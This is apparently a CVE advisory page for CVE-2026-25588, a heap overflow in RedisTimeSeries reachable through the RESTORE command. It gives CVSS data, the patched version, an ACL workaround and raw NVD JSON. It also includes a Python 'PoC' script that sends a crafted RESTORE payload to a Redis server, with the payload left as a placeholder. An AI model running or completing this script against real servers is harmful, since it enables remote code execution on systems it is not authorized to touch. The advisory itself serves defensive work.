Security Vulnerability Report
CVE-2026-25588 CVSS 8.8 HIGH

CVE-2026-25588

Published: 2026-05-05 17:17:04
Last Modified: 2026-05-07 13:46:38

Description

RedisTimeSeries is a time-series module for Redis. In all versions before 1.12.14 of RedisTimeSeries, the module does not properly validate serialized values processed through the Redis RESTORE command. An authenticated attacker with permission to execute RESTORE on a server with the RedisTimeSeries module loaded can supply a crafted serialized payload that triggers invalid memory access and may lead to remote code execution. A workaround is to restrict access to the RESTORE command with ACL rules. This has been patched in version 1.12.14.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:redistimeseries:redistimeseries:*:*:*:*:*:*:*:* - VULNERABLE
RedisTimeSeries < 1.12.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import redis

# Target configuration
TARGET_HOST = '127.0.0.1'
TARGET_PORT = 6379
REDIS_PASSWORD = 'your_password'

# Connect to Redis
client = redis.Redis(host=TARGET_HOST, port=TARGET_PORT, password=REDIS_PASSWORD)

# Crafted malicious serialized payload
# This is a conceptual payload. A real exploit would contain specific
# bytes designed to corrupt memory in RedisTimeSeries.
malicious_payload = b"\x0a\x00\x00\x00..."

try:
    # Send RESTORE command to trigger the vulnerability
    # The '0' indicates no TTL, 'REPLACE' overwrites existing key
    response = client.execute_command('RESTORE', 'vuln_key', '0', malicious_payload, 'REPLACE')
    print("Exploit sent, check server status.")
except redis.ResponseError as e:
    print(f"Redis error: {e}")
except Exception as e:
    print(f"Connection error: {e}")

References

https://github.com/RedisTimeSeries/RedisTimeSeries/releases/tag/v1.12.14 (Patch, Product)
https://github.com/RedisTimeSeries/RedisTimeSeries/security/advisories/GHSA-7jwr-g5qv-w3gw (Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25588", "sourceIdentifier": "[email protected]", "published": "2026-05-05T17:17:03.800", "lastModified": "2026-05-07T13:46:38.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RedisTimeSeries is a time-series module for Redis. In all versions before 1.12.14 of RedisTimeSeries, the module does not properly validate serialized values processed through the Redis RESTORE command. An authenticated attacker with permission to execute RESTORE on a server with the RedisTimeSeries module loaded can supply a crafted serialized payload that triggers invalid memory access and may lead to remote code execution. A workaround is to restrict access to the RESTORE command with ACL rules. This has been patched in version 1.12.14."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": 
"NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redistimeseries:redistimeseries:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.12.14", "matchCriteriaId": "6F340A97-7BFF-46C0-9676-F1E76164088E"}]}]}], "references": [{"url": "https://github.com/RedisTimeSeries/RedisTimeSeries/releases/tag/v1.12.14", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/RedisTimeSeries/RedisTimeSeries/security/advisories/GHSA-7jwr-g5qv-w3gw", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}